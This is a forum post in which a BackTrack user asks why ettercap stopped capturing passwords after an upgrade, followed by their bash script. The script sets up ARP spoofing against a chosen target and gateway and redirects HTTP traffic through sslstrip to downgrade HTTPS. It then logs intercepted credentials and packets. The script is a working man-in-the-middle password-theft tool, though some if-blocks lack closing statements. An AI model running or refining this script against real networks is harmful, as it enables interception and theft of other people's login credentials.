Hi everybody,

In BT4 I had a script to capture passwords with ettercap and sslstrip, this worked fine. But now in BT5 ettercap is not finding the passwords. When I look with wireshark to the pcap file, I can find the passwords in here (https). I searched this forum and google, also tried to reinstall ettercap with the fix so its not crashing anymore, but no luck. Is there someone with the same problem and has a fix?


echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
echo -n "Enter the IP of the Gateway: "
read -e GW
echo -n "Enter the IP of the Target: "
read -e TA
echo -n "Use sslstip y/n: "
read -e SSL
echo -n "Save all packets in a pcap file y/n: "
read -e PCAP

echo "Start"
killall -9 sslstrip ettercap
echo 1 > /proc/sys/net/ipv4/ip_forward

sleep 3
if [ $SSL = "y" ]; then
	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
	xterm -e sslstrip -a -k -f -l 10000 &
	iptables -F

sleep 3
if [ $TA > 0 ]; then
	#xterm -e ettercap -i $IFACE -Tq -M ARP /$GW/ /$TA/  &

	xterm -e arpspoof -i $IFACE -t $TA $GW & 
	xterm -e arpspoof -i $IFACE -t $GW $TA & 
	xterm -e ettercap -i $IFACE -Tq -M ARP /$GW/ // -P autoadd &

sleep 3
if [ $PCAP = "y" ]; then
	xterm -e ettercap -i $IFACE -Tqzu -l cred$(date +%F-%H%M) -w packets$(date +%F-%H%M).pcap &
	xterm -e ettercap -i $IFACE -Tqzu -l cred$(date +%F-%H%M) &

echo "To see the log file"
echo "#etterlog cred.eci"
echo "To see the stored creds"
echo "#etterlog -p cred.eci"